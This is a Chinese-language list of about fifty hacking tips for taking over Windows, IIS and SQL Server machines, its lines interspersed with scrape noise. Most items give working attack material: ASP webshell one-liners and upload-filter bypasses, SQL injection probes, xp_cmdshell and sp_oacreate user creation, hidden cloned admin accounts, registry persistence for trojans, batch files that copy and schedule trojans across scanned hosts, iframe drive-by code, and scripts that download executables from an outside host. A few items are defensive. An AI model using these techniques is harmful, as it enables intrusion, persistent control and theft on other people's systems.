Xp系统修改权限防止病毒或木马等破坏系统,cmd下,' O1 k8 W4 x" k; I& ]
cacls C:\windows\system32 /G hqw20:R
7 t, Z8 s) D5 I+ m& M7 s思是给hqw20这个用户只能读取SYSTEM32目录,但不能进行修改或写入
' e- G/ F& X- X% R0 S' Q0 l) Z恢复方法:C:\>cacls C:\windows\system32 /G hqw20:F0 m4 }1 f4 C: { v( H
* a* Y0 y4 {( n0 ?2、用Microsoft自带的IExpress工具作的捆绑木马可以躲过很多杀毒软件,运行对话框中输入Iexpress。
3 t& N1 b& Q, m0 m; \' X6 _
5 q2 _0 i M [" V* b" L( T$ n3、内网使用灰鸽子,肉鸡上vidcs.exe -p端口,本地VIDCS里,VIDCS服务IP 填肉鸡的IP,VIDCS服务端口,就是给肉鸡开的端口,BINDIP添自己的内网IP,BIND端口 添8000,映射端口添8000。
/ J; C5 }2 I3 o8 g7 f5 S8 D0 v8 f8 ^- @
4、建立隐藏帐号,上次总结了用guest建立隐藏的管理员,这次再介绍一种,在cmd下建立一个ating$的用户,然后注册表下复制管理员的1F4里的F 值到ating$的F值,再把ating$改为$,这样在计算机管理的用户里看不到这个隐藏帐号
% a% Y4 m8 _* C8 ~
! W- }& ]. g9 Y( [: k& o/ Q; j$ V: S5、利用INF文件来修改注册表
5 S; b* Q+ {- ^" F# z8 @' {4 p" I[Version]
# z) }0 ], t' V1 N& n4 [8 rSignature="$CHICAGO$"
7 D. ?/ P! s2 X6 E( ^! R% v. z; N[Defaultinstall]! d. {. O2 K3 p, x& w5 N" h
addREG=Ating
& F; Y1 a8 v1 p1 e[Ating]
: D" O3 M6 g. HHKCU,"Software\Microsoft\Windows\CurrentVersion\Policies\system","disableregistrytools","0x00010001","1": E( H$ D" o$ ~- C
以上代码保存为inf格式,注意没有换行符,在命令行里导入inf的命令如下:
4 |& I A- A/ r! S. d# S0 nrundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 inf文件的具体路径- A. y. B/ \7 Q/ ~& ~# i$ N
其中HKEY_CLASSES_ROOT 简写为 HKCR,HKEY_CURRENT_USER 简写为 HKCU
, T Y3 V* t* E% WHKEY_LOCAL_MACHINE 简写为 HKLM,HKEY_USERS 简写为 HKU/ o. T9 s% q- L: m3 i
HKEY_CURRENT_CONFIG 简写为 HKCC, Z7 \* p4 f! D
0x00000000 代表的是 字符串值,0x00010001 代表的是 DWORD值
0 D V& G! f3 s6 T3 A% Z z K"1"这里代表是写入或删除注册表键值中的具体数据1 p; j0 i) a+ u: _ [. e
7 y. y% q' J; \# B. {8 f; r' z7 h
6、关于制作穿xp2防火墙的radmin,大家一定要会,各大黑客网站都有动画,
' Y$ @) f& m* ~/ f9 j多了一步就是在防火墙里添加个端口,然后导出其键值
$ ?0 P7 K3 U) e. |5 M[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List]& B' S% W. q' ~5 j/ S" b6 N# E0 R2 V- d; {
, {4 A4 P5 b5 U7、系统启动时Alerter服务启动前启动木马程序ating.exe,此方法很隐蔽
: q( l5 Y! V( B! T; @在[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CurrentVersion\Image File Execution Options]下建立service.exe项,再在service.exe项建立一个Debugger的键(字符串值),键值填ating.exe的全路径。
6 H( A: X& C g" X/ T9 o" j' k# d: d
8、将ftp.exe传到服务器用来提权,可以先把它变成ating.gif格式的再用,迷惑管理员。
) j' [1 o' e6 b% J* z4 ^) N2 a- Y s! ~! X+ I
9、有时候在我们进入了网站后台,但是没有上传图片和备份等功能,得不到webshell,$ `* |+ ]; O& d- g
可是不能白来一场,可以看看发表公告或新闻支不支持html和script,支持的话加个frame马或者其他的什么。) m+ J3 v* b, J. V+ o$ J7 D" N
* Y: }% V/ i) d0 Y! m) S6 X, [10、用google帮我们找网站后台,搜索”filetype:asp site:www.hack6.com inurl:login”* J" _% E- `- F3 _
8 g1 r$ T* @, h11、我们中了盗密码的木马后不要急于删除,一般这些木马都是把密码发到指定邮箱,我们可以用探嗅软件来找到邮箱的用户名和密码,比如安全焦点的xsniff,
2 T# v9 z: v1 J9 c! ^- n% O用法:xsniff –pass –hide –log pass.txt
& N$ ?/ j7 w. e
7 G* C; w- {% P4 d) s12、google搜索的艺术
2 O* ?- O* @7 _, \' c搜索关键字:“未闭合的引号”或“ADODB.Field.error”或“Either BOF or EOF in True”
* G- Y- v3 r8 D或“字符串的语法错误”可以找到很多sql注入漏洞。, W* n$ L3 }4 b3 D8 J3 c6 P
/ M9 z% `( Q# ^. n8 m
13、还可以搜一些木马的关键字,比如搜索“管理登陆 海洋顶端 inurl:asp”,搜到了说明此网站服务器的其中网站肯定有漏洞。( e4 Z0 [& U+ Q( k
) s3 }: O/ I d" F14、cmd中输入 nc –vv –l –p 1987
) g+ ?& a; `# d5 C, f/ i ?3 j做个bat文件内容为sqlhello 起始ip 1433 终止ip 1987 扫鸡吃
. B3 m; {. N9 V5 L: o% T: v2 v i2 b% a( e
15、制作T++木马,先写个ating.hta文件,内容为
) j5 @# u7 u1 a+ c$ |2 g; Z- e<script language="VBScript">
& u, Y$ o! e2 K' r/ Bset wshshell=createobject ("wscript.shell" )
& S* i) ~7 U1 q! J% F/ Aa=wshshell.run("你马的名称",1)
* x+ a) x5 K$ V9 lwindow.close1 R" G7 x. ?5 }. f* g% ^
</script>
) o, V2 h% i" m7 q( l L c9 B2 N再用mshta生成T++木马,命令为mshta ating.hta ating.t++,用网页木马生成器生成网页木马。" _. g' f' S% o9 B4 T) X
! [/ _. b9 [9 p0 O16、搜索栏里输入( N' F1 L# V. z
关键字%'and 1=1 and '%'='/ j9 E m# ?! q$ H2 z
关键字%'and 1=2 and '%'='
* `; F; O `3 F; t5 G( F. b' V: `比较不同处 可以作为注入的特征字符
6 o0 Z+ U$ x0 z3 i+ h- \! Q) b
5 w. e w7 l" |17、挂马代码<html> U D+ B3 r/ D! |8 P a" r
<iframe src="马的地址" width="0" height="0" frameborder="0"></iframe>
. X) c3 X# {# H2 ^# k6 I, A( k</html>
- z$ A! H2 k4 H" ^# r
! {+ ?2 e0 z) S! N, l; `7 R18、开启regedt32的SAM的管理员权限检查HKEY_LOCAL_MACHINE\SAM\SAM\和HKEY_LOCAL_MACHINE\SAM\SAM\下的管理员和guest的F键值,如果一样就是用被入侵过了,然后删了guest帐号,对方可以用guest帐号使用administraeors的权限,你也可以用这方法留住肉鸡, 这方法是简单克隆,! z9 y- L0 }3 V0 ^, y
net localgroup administrators还是可以看出Guest是管理员来。" F* n* |9 z& o8 [5 D) B$ }9 h
1 o& T5 y1 j+ {8 M3 k' Y T5 ]
19、软件instsrv.exe 把.exe文件做成系统服务来启动 用来肉鸡挂QQ等
) w) O1 j$ f7 _用法: 安装: instsrv.exe 服务名称 路径5 A' V& a3 P- k( P
卸载: instsrv.exe 服务名称 REMOVE
( a2 ~7 h* [0 |' ` k
" n$ y1 l. b& U* B7 ?: l: t, _" x9 [2 I7 r& N" g* `6 }
21、SQL注入时工具---Internet选项---高级里找到显示友好的错误信息勾去掉
. X, n- U! D5 w不能注入时要第一时间想到%5c暴库。
$ \9 ]4 J: A: N( Q. j- r, a9 e7 \) u
22、很多网站程序(比如华硕中文官方网站)上传图片时有可能在检测文件的时候是 从左朝又进行检测,也就是说,他会检测文件是不是有.jpg,那么我们要是把文件改成:ating.jpg.asp试试。。由于还是ASP结尾,所以木马不会变~5 h2 C3 A, d" `/ X/ r# A4 E8 N9 `
3 u6 m9 }+ K% [: o5 Z; |, _3 e23、缺少xp_cmdshell时- t$ M9 [ h9 D8 ~. l$ t
尝试恢复EXEC sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'$ [3 N; C; s2 W
假如恢复不成功,可以尝试直接加用户(针对开3389的)
9 t; k: T% V# H4 }declare @o int
7 B- L3 D2 J' @# [/ _- F6 Lexec sp_oacreate 'wscript.shell',@o out
0 A0 h# G6 R2 q0 P; B4 ^) a; bexec sp_oamethod @o,'run',NULL,'cmd.exe /c net user ating ating /add' 再提到管理员9 q# I1 O7 S" a) a
: h; Q" z; l0 p6 _+ z0 A24.批量种植木马.bat8 N' L$ o- S* e! J# p
for /f %%i in (扫描地址.txt) do copy pc.exe %%i\admin$ 复制木马到扫描的计算机当中
8 U/ u* q+ g1 `: ~, U c' M1 v, pfor /f %%i in (扫描地址.txt) do at %%i 09:50 pc.exe 在对方计算机上运行木马的时间9 H' J" P+ S/ ^7 S- k* @8 P& q
扫描地址.txt里每个主机名一行 用\\开头0 T2 e. I; U7 |. z' z2 I+ ^
( d# T: x6 ]/ L25、在程序上传shell过程中,程序不允许包含<% %>标记符号的内容的文件上传,比如蓝屏最小 的asp木马<%execute request("l")%>,我们来把他的标签换一下: <script language=VBScript runat=server>execute request("l")</Script> 保存为.asp,程序照样执行。. x6 I7 v, P. w: p/ s2 X+ D
5 W7 |6 W0 V$ f6 y. B26、IIS6 For Windows 2003 Enterprise Edition 如IIS发布目录文件夹包含.asp后辍名.( p1 O- k; O P
将.asp后辍改为.jpg或其它的如.htm,也可以运行asp,但要在.asp文件夹下.* N4 r+ `8 M4 N1 [# Z5 p: o& E5 Q
.cer 等后缀的文件夹下都可以运行任何后缀的asp木马- G; O, v; l7 h+ Z
/ C! n. t& B- z$ L$ K27、telnet一台交换机 然后在telnet控制主机 控制主机留下的是交换机的IP4 H1 A7 }9 D" \; L7 i( x; s- r
然后用#clear logg和#clear line vty *删除日志
) }( E) ^: J0 \! Z, K
- ]: R+ f j' p% E* z2 e28、电脑坏了省去重新安装系统的方法
9 {# I1 K& Q X4 y: T, J纯dos下执行,
( s+ t$ R( I8 Q/ g0 @/ H' Axp:copy C:\WINDOWS\repair\*.* 到 c:\windows\system32\config3 c) W6 Q* c( c) v
2k: copy C:\winnt\repair\*.* 到 c:\winnt\system32\config0 U" [: {/ P% x& D4 }- {- Y/ }9 r" K
! k& l, Y- c3 U% ?$ s7 k- {
29、解决TCP/IP筛选 在注册表里有三处,分别是:, n) v1 _7 o1 P4 u- S# H9 M" B
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip, I+ u; m2 \/ X: f
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip
# H0 p& e1 T+ _ t: B+ HHKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip; W& N! G: f4 O, O4 C* D: E
分别用% G0 ^/ P' R4 A+ n. d
regedit -e D:\a.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
+ Q7 R7 K; ?- w! Rregedit -e D:\b.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip
+ N/ b* r T% R0 Nregedit -e D:\c.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip3 L/ P5 Y; g# e: d+ n' c1 t! l
命令来导出注册表项8 Z% _4 F4 M/ v
然后把三个文件里的EnableSecurityFilters"=dword:00000001,& F% p Y/ B/ l5 w5 T: H
改成EnableSecurityFilters"=dword:00000000 再将以上三个文件分别用4 B/ Q! @6 O N0 q
regedit -s D:\a.reg regedit -s D:\b.reg regedit -s D:\c.reg 导入注册表即可。
% } ?) ?- y$ O
9 k; T. T; `3 D, c4 @! B3 Q! L30、使CHM木马无法在本地运行木马程序 将注册表"HKEY_CURRENT_U# N \ Z6 g( h
SER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0"下的1004项的值由原来十进制的0改为十六进制的3
1 C& \$ e. ?" [% d, G. A
. u& |. `! {7 K8 Q8 W6 ?3 L9 {. F31、全手工打造开3389工具$ u" x* w3 u& d& \! X+ O7 A# Q
打开记事本,编辑内容如下:' V2 @$ t$ }+ [: s0 r
echo [Components] > c:\sql
4 B1 s5 v2 \3 Q# x0 N7 ?+ fecho TSEnable = on >> c:\sql6 z; p' z# i8 v# p n; P
sysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\sql /q, g9 x \8 y4 h
编辑好后存为BAT文件,上传至肉鸡,执行
- r4 C# q% A1 ^
0 k: J- |, C( R2 K, F32、挂马js代码document.write('<iframe height=0 width=0 src="木马地址.htm"></iframe>');保存到js页面里 可让所有页面挂马0 n0 \) \' ^, s, _
$ }4 X% m; v- b- _/ r( J) l33、让服务器重启
; ~6 v) b+ O' C' a( ~' M' G; v# T5 y写个bat死循环:3 R; x& e1 U. D) D9 ^! f* `7 T
@echo off
: R) T3 H0 E2 K1 f N- h3 n:loop1
) h' u, O7 c4 b( P6 @; Gcls9 {' h% K. [1 R8 r
start cmd.exe
4 @4 D& K9 Y" p1 egoto loop1
2 |# G! I$ c4 w. G6 a7 a5 ~保存成bat guset权限就可以运行 运行后很快服务器就会死机 管理员自然会去重启( {6 d) p7 z z7 G
9 z6 ^) ~( ^ D3 L3 o0 h34、如果你登录肉鸡的3389时发现有cmd一闪而过,那你可要小心了,管理员写了个bat在监视你,
- p% D8 n' u9 ?4 i# r# g3 E/ y@echo off9 `# C* [! j: @1 h) ?+ U% @
date /t >c:/3389.txt
& m: c' g- e% D# _! D- M& g( otime /t >>c:/3389.txt
/ L+ F }+ {) y' l4 ?3 _attrib +s +h c:/3389.bat; w3 _2 W: l0 H9 C
attrib +s +h c:/3389.txt
1 Z* E& v" m5 ~. dnetstat -an |find "ESTABLISHED" |find ":3389" >>c:/3389.txt0 D" ~7 U. L3 I" o' d; O* I( ~
并保存为3389.bat" b1 y9 n# [- q% ]% k% p$ Y5 v2 a
打开注册表找到:Userinit这个键值 在末尾加入3389.bat所在的位置,比如我放到C盘,就写:,c:/3389.bat,注意一定要加个逗号
* G# E, ~8 u0 |) S7 R/ o/ x& P- v, P, d6 G0 L& I# W! X
35、有时候提不了权限的话,试试这个命令,在命令行里输入:( [9 L2 S& N6 u V
start http://www.hack520.org/muma.htm然后点执行。(muma.htm是你上传好的漏洞网页)
* d; n8 A5 \. {* k输入:netstat -an | find "28876" 看看是否成功绑定,如果有就telnet上去,就有了system权限,当然也可以nc连接,本地执行命令。
, F) b* s7 l* e) H W. H; R0 L% U; {% f
36、在cmd下用ftp上传马方法,我们可以用echo 写一个批处理文件6 j: q' o2 y- m4 H! r" O
echo open 你的FTP空间地址 >c:\1.bat //输入你的FTP地址
! ]3 h' `/ M/ [. C$ x: A0 Wecho 你的FTP账号 >>c:\1.bat //输入账号
; [' ^/ n! d9 |1 g( Iecho 你的FTP密码 >>c:\1.bat //输入密码
& O6 l4 d, N8 N$ Y* necho bin >>c:\1.bat //登入
: N8 P6 _$ a) mecho get 你的木马名 c:\ ating.exe >>c:\1.bat //下载某文件到某地方并改名为什么% i/ U0 l! O/ |
echo bye >>c:\1.bat //退出
3 I5 ^$ [0 n) c, U/ P9 U, c1 R1 y3 ?# ?然后执行ftp -s:c:\1.bat即可
* M- ~6 Z! F4 X9 R) T" s0 i2 a7 @: N! o0 g- s! T% E* H( ?
37、修改注册表开3389两法) j4 G1 v8 a) L1 I% Z. C( E
(1)win2000下开终端 首先用ECHO写一个3389.reg文件,然后导入到注册表6 t. K1 u {" T' d
echo Windows Registry Editor Version 5.00 >>3389.reg" g8 ?, ^/ F3 f' \9 Y
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>3389.reg) p, u# Q0 S* ~7 D( s
echo "Enabled"="0" >>3389.reg& P$ `# ]; [, s9 G& y
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows2 J" l5 G' ]' H0 q
NT\CurrentVersion\Winlogon] >>3389.reg* d1 v$ S( H! T. p
echo "ShutdownWithoutLogon"="0" >>3389.reg* y2 ^& w6 G7 U0 {' t
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer]
. X7 O5 `# [0 |* l1 ^$ W>>3389.reg
: E+ T+ z* Z/ I' H" M" A- Hecho "EnableAdminTSRemote"=dword:00000001 >>3389.reg
9 l6 ^0 [( l+ [0 wecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]
9 a. d! r+ V2 X, T>>3389.reg' x6 x* n6 B6 z" Y8 ^6 I4 a
echo "TSEnabled"=dword:00000001 >>3389.reg% c9 q1 E6 w9 K5 d( h
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>3389.reg
0 T- S/ N+ W, i* fecho "Start"=dword:00000002 >>3389.reg7 t0 N) ?8 q0 U" |$ M. \
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService]
# B1 B' G9 D8 ?8 I/ A6 p>>3389.reg1 i0 W. j8 H( L2 [
echo "Start"=dword:00000002 >>3389.reg5 W3 O0 n- H- R2 e( g
echo [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>3389.reg" S7 u8 V; {/ B$ R; Y* t. c
echo "Hotkey"="1" >>3389.reg
4 a) ]+ v* q( A3 ^echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
% V( T4 f# u7 {' Q. R2 nServer\Wds\rdpwd\Tds\tcp] >>3389.reg
- s1 a5 `: ?) L0 xecho "PortNumber"=dword:00000D3D >>3389.reg
+ r, E3 @. q( _8 cecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
3 t$ p+ R t8 l5 nServer\WinStations\RDP-Tcp] >>3389.reg
: \1 O" f3 q) R! _6 G! {echo "PortNumber"=dword:00000D3D >>3389.reg
1 b' C- J6 N8 i: z' w2 \把这些ECHO代码到CMDSHELL下贴粘就可以生成3389.reg文件,接着regedit /s 3389.reg导入注册表。* b3 ~/ }& M0 C. [
(如果要改变终端端口只须把上面的两个D3D都改一下就可以了), Y6 T0 R Z; T5 Y4 E) u
因为win 2k下开终端不能像XP一样可以立即生效,而是需重启机器后才生效
2 V) c' b& B; J2 p [' R: U(2)winxp和win2003终端开启
5 |! B# R. \$ t( s* O用以下ECHO代码写一个REG文件:
% ~ l" U3 K* C2 R) F& F( H* u; recho Windows Registry Editor Version 5.00>>3389.reg
5 M; [) K0 z# ~# e5 H mecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
2 I: b) e1 N1 H! I, Z- yServer]>>3389.reg: O9 ~ ^; n9 g0 }) N; l
echo "fDenyTSConnections"=dword:00000000>>3389.reg' v" U6 D- A* Z+ W% n
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal0 c5 _/ K+ z6 Y {( {* I
Server\Wds\rdpwd\Tds\tcp]>>3389.reg
/ Q J' p% W) j+ l: v& b. f9 Qecho "PortNumber"=dword:00000d3d>>3389.reg3 X" a- i7 e' k- _2 g& g7 ]
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal9 }) R7 [% n5 `/ y
Server\WinStations\RDP-Tcp]>>3389.reg
; s6 i8 g a, G9 Q1 i8 fecho "PortNumber"=dword:00000d3d>>3389.reg# T: B( i: J7 @0 l% A, v$ _
然后regedit /s 3389.reg del 3389.reg
) E! K" ^9 ]& }" w# bXP下不论开终端还是改终端端口都不需重启- z7 [$ Y) T! q5 L' ]
1 \3 R2 v% }9 V; w2 o* o' K38、找到SA密码为空的肉鸡一定要第一时间改SA密码,防止别人和我们抢肉吃
9 I# ^! x4 p* y, {2 G% \用查询分析器运行 EXEC sp_password NULL, '你要改的密码', 'sa', e' g' G* @- U; y" \0 H
% _! }8 \: b2 \" G39、加强数据库安全 先要声明把mdb改成asp是不能防止下载的!. P, q+ b) r* h" e& F% a
(1)数据库文件名应复杂并要有特殊字符
" C9 Y) F2 S' q, l* g(2)不要把数据库名称写在conn.asp里,要用ODBC数据源
) I8 \2 R4 r- ~7 x( M+ M! |8 b将conn.asp文档中的
6 A6 ^, Z$ R; h1 @7 w! _; Q% ]DBPath = Server.MapPath("数据库.mdb"): K: L5 | E/ f1 N! _4 T4 ^& [
conn.Open "driver={Microsoft Access Driver (*.mdb)};dbq=" & DBPath
4 u7 ^( S# x7 Y/ P a6 b$ \+ y% ]
% o- a: `0 Z, G, ^4 ?修改为:conn.open "ODBC数据源名称," 然后指定数据库文件的位置- d L8 |7 z9 ~+ f6 t
(3)不放在WEB目录里
0 g; I. {! {5 g/ w6 U
9 L' w6 P# M3 Z: i( c9 X7 v40、登陆终端后有两个东东很危险,query.exe和tsadmin.exe要Kill掉& r" H, L+ s3 K/ q% _
可以写两个bat文件% {" P4 D* y# `% E/ J3 w
@echo off+ V4 N' J0 e$ C I: N
@copy c:\winnt\system32\query.exe c:\winnt\system32\com\1\que.exe T. |* _/ c. R* F+ A
@del c:\winnt\system32\query.exe$ g+ D% K. L: ^
@del %SYSTEMROOT%\system32\dllcache\query.exe
- H7 {# X9 k) _7 l S" d3 O9 J@copy c:\winnt\system32\com\1\query.exe c:\winnt\system32\query.exe //复制一个假的# V Q5 r7 K4 G N x+ W" y
7 o# N; Q+ c7 u7 Y& |$ m1 `- L1 G, D@echo off
! B G! T" f) ~* z@copy c:\winnt\system32\tsadmin.exe c:\winnt\system32\com\1\tsadmin.exe
S% U4 \4 l. G# w: o@del c:\winnt\system32\tsadmin.exe
1 e# s8 ~* e" ^, H@del %SYSTEMROOT%\system32\dllcache\tsadmin.ex
; J% U0 L, E; R8 Y5 B4 L# \$ q3 ^! T% Q6 h5 @, C
41、映射对方盘符5 x6 ]% P. P- S$ @* O) ]4 D
telnet到他的机器上,- L& x) U/ w7 u3 m; |3 e: P( T( r0 w
net share 查看有没有默认共享 如果没有,那么就接着运行% u ~, ~$ q7 r( {* `0 h
net share c$=c:
( w5 @, x0 A) ?. g) W* ?* wnet share现在有c$
( n! R$ Z% |* X1 U在自己的机器上运行6 B* W4 Q* Y4 y* i1 Z8 A
net use k: \\*.*.*.*\c$ 把目标共享映射到本地硬盘,盘符为K, l4 J& {( b: k6 _1 ], }0 O
# m5 r5 O6 ]5 S8 v42、一些很有用的老知识
4 M: s* d' q2 G" i) otype c:\boot.ini ( 查看系统版本 )
$ y' n: w# g) O# L* jnet start (查看已经启动的服务)
$ ~6 T5 _$ v) T: p) ?5 @, `query user ( 查看当前终端连接 )
! _" H. d# `6 {3 E' r* inet user ( 查看当前用户 )
r4 _* x4 G! E+ W7 v1 I& t: mnet user 用户 密码/add ( 建立账号 ). X [7 P+ i, S- S5 y7 _
net localgroup administrators 用户 /add (提升某用户为管理员)
5 q+ V! C) `, \. ~9 E9 b) @ipconfig -all ( 查看IP什么的 )
: q7 p- | o2 Q4 z* t* G# h) Unetstat -an ( 查看当前网络状态 )
3 I2 b# x# |+ B, p; |% g7 jfindpass 计算机名 管理员名 winlogon的pid (拿到管理员密码)
" }" V/ \( p5 V* g5 S1 U; F克隆时Administrator对应1F4
. U8 @- @9 F) q# [1 @+ ~guest对应1F5
, J, j; t' @; \- l B: otsinternetuser对应3E8" x; d$ v8 W5 V! G) r3 R2 J
, B: @5 \- A5 H' ^5 L
43、如果对方没开3389,但是装了Remote Administrator Service/ P! ]6 b) Z) _ Y; p9 f4 a
用这个命令F:\ftp.exe "regedit -s F:\longyi.biz\RAdmin.reg" 连接
, R8 f9 K) A/ T5 g7 ~解释:用serv-u漏洞导入自己配制好的radmin的注册表信息
1 f$ F/ i: G% Q ?; ?% F先备份对方的F:\ftp.exe "regedit -e F:\1.reg HKEY_LOCAL_MACHINE\SYSTEM\RAdmin"0 t( y+ N) d O3 ]
- d6 @, u0 b- L- h0 W% Q44、用lcx做内网端口映射,先在肉鸡上监听 lcx -listen 52 8089 (端口自定)
& l' y4 k6 h0 y; R( h* J本地上运行映射,lcx -slave 鸡的ip 52 我内网的ip 80 (我的WEB是80端口)
7 \, w# J6 T: S4 P' B+ L4 |" x, v. g: ]7 N: z) L% u2 p
45、在服务器写入vbs脚本下载指定文件(比如用nbsi利用注入漏洞写入)3 D, C% H0 m' P' g. }% w" r$ l
echo Set x= CreateObject(^"Microsoft.XMLHTTP^"):x.Open
8 P- ?' Z2 J" j/ c^"GET^",LCase(WScript.Arguments(0)),0:x.Send():Set s =
0 o+ H" B/ x5 \CreateObject(^"ADODB.Stream^"):s.Mode = 3:s.Type =2 A5 j) ^: [# \; D; ?3 i4 y3 h4 ~
1:s.Open():s.Write(x.responseBody):s.SaveToFile LCase(WScript.Arguments(1)),2 >ating.vbs
% s6 i- f2 r- A3 B% b( g(这是完整的一句话,其中没有换行符)* Q& A* Y* r/ x& k' d
然后下载:
: e# n) }: a6 p, k! l! }& h2 Tcscript down.vbs http://www.hack520.org/hack.exe hack.exe
$ o& g7 @% Q1 u! r6 J2 k. n6 K; _5 o% P7 I4 [5 k+ f3 N0 q
46、一句话木马成功依赖于两个条件:5 H7 J2 ~! x; n% c1 P7 Q/ A& m
1、服务端没有禁止adodb.Stream或FSO组件2 E& v2 h: m8 r* X- p; \
2、权限问题:如果当前的虚拟目录禁止user级或everyone写入的话也是不会成功的。- p/ d, \5 d$ o# Q7 C+ t
K) y9 S! l1 L, i3 S% a+ z
47、利用DB_OWNER权限进行手工备份一句话木马的代码:
) c# z; v1 O4 Q( L5 z;alter database utsz set RECOVERY FULL--
- f- E: f1 L" h' l8 S;create table cmd (a image)--6 m( d9 z7 U0 U& p I
;backup log utsz to disk = 'D:\cmd' with init--9 p& s. j; b( h. ~. G
;insert into cmd (a) values (0x3C25657865637574652872657175657374282261222929253EDA)--# a' N3 O4 J I0 X$ y
;backup log utsz to disk = 'D:\utsz_web\utsz\hacker.asp'--
! `3 Z. r3 W9 C5 Q8 F* R" ?注:0x3C25657865637574652872657175657374282261222929253EDA为一句话木马的16进制形式。7 C0 d: v! Z- c) A
" I# T2 J# q" t- E6 M5 P48、tlntadmn是telnet服务的设置命令,可以对telnet服务的端口、认证方式等进行设置:* @. x1 Z+ ]5 U: a$ W
5 A3 @4 u4 p( f9 ^/ i$ s; c2 l用法: tlntadmn [computer name] [common_options] start | stop | pause | continue | -s | -k | -m | config config_options
5 ]+ |2 d+ t$ z; U$ x% @9 I所有会话用 'all'。4 q4 K) H4 c1 h$ \1 T+ }8 C9 S: t& F( Y
-s sessionid 列出会话的信息。
F, g% e3 H9 {1 B4 f3 A-k sessionid 终止会话。8 U# W( e$ ]0 i3 e) a- M
-m sessionid 发送消息到会话。8 ?2 d6 D5 W _# T( o
( x7 C/ g3 ?/ o7 h9 f4 Lconfig 配置 telnet 服务器参数。7 a- V z( [, [' y/ ~
; ~3 s$ K* w2 T+ K# X8 ?common_options 为:" W9 g$ B+ q' J: b _0 p1 @
-u user 指定要使用其凭据的用户' D: Q: ^; u+ e* G6 Y- a! r
-p password 用户密码6 G% {2 Y0 S1 R) H m" V) e" I0 ?$ ~
, H" `3 U! ^" u& ]
config_options 为:
1 W; ~. f$ h( A4 ?& fdom = domain 设定用户的默认域0 W2 c+ Q2 p9 b8 x3 t- u3 H
ctrlakeymap = yes|no 设定 ALT 键的映射! M7 ?- {! H# @! y; j% e
timeout = hh:mm:ss 设定空闲会话超时值
% x' M3 B5 X9 v6 G, U% }timeoutactive = yes|no 启用空闲会话。
* ]0 d" N) u5 F5 S* U- bmaxfail = attempts 设定断开前失败的登录企图数。
- k9 y* X. `: h0 M4 ^ I7 rmaxconn = connections 设定最大连接数。/ ?6 S( d8 [. O$ h0 @1 J
port = number 设定 telnet 端口。
2 q0 B2 ?7 b7 T1 g* N* x! d' C6 ysec = [+/-]NTLM [+/-]passwd8 C- D4 T; `0 P& n7 k r- C: [6 B
设定身份验证机构
$ b: v$ H, D5 [, s# [# Pfname = file 指定审计文件名。" U1 N5 c- z# A
fsize = size 指定审计文件的最大尺寸(MB)。
/ y1 Y% v( K" ~9 E2 Emode = console|stream 指定操作模式。
# `. Z x' H! h# z$ Xauditlocation = eventlog|file|both$ q, B8 C B! C* S9 B+ u
指定记录地点; ]$ H% S4 D& I; ^8 |" b
audit = [+/-]user [+/-]fail [+/-]admin
& T$ n% e w5 ]! v& H/ j J0 y( n' ?1 F3 }5 E. Y Y
49、例如:在IE上访问:4 R3 |& z' v) I% u* {" A- L: v
www.hack520.org/hack.txt就会跳转到http://www.hack520.org/
2 F' ]2 b& h) j1 X+ ?$ dhack.txt里面的代码是:' |: v( P* a2 N: H" L; B, a
<body> <META HTTP-EQUIV="Refresh" CONTENT="5;URL=http://www.hack520.org/">
# F0 T2 H# Y1 |% @ R2 M1 V把这个hack.txt发到你空间就可以了!
# @) w& p g0 Z1 ^. \ v$ ?. v这个可以利用来做网马哦!
& _) i2 N; b7 N, ]! G' L3 d" v3 h: ^) I4 M6 {/ j9 l
50、autorun的病毒可以通过手动限制!
* I8 b* ?# ^! ]: A) M3 @1,养成好习惯,插入U盘或移动硬盘,都要按住shift让其禁止自动运行!
. |6 l+ h# g; G" }4 q0 j. e, f! x+ |2,打开盘符用右键打开!切忌双击盘符~
0 l7 @6 C" c( J! N9 @7 o3,可以利用rar软件查看根目录下autorun病毒并删除之!他可以处理一些连右键都无法打开的分区!
' w* S+ _& ~. ^: o- h5 N3 E) K3 q: x% o3 `3 o# A# q- N% h1 Q
51、log备份时的一句话木马:7 V4 ^, _* d8 \- t
a).<%%25Execute(request("go"))%%25>6 b6 w4 N9 P8 N* i% j$ F( I
b).<%Execute(request("go"))%>8 P: ^6 r( i' m5 j
c).%><%execute request("go")%><%( u& b- @: @: g: u
d).<script language=VBScript runat=server>execute request("sb")</Script> Z0 d5 K; W7 N& z, T2 M: |
e).<%25Execute(request("l"))%25>
- m7 N4 _- ]* Kf).<%if request("cmd")<>"" then execute request("pass")%>, E. i! y: `9 }: v0 ]! U1 U
# R9 h8 Y7 c4 f0 w) z% `
52、at "12:17" /interactive cmd4 m9 U% j# s3 q
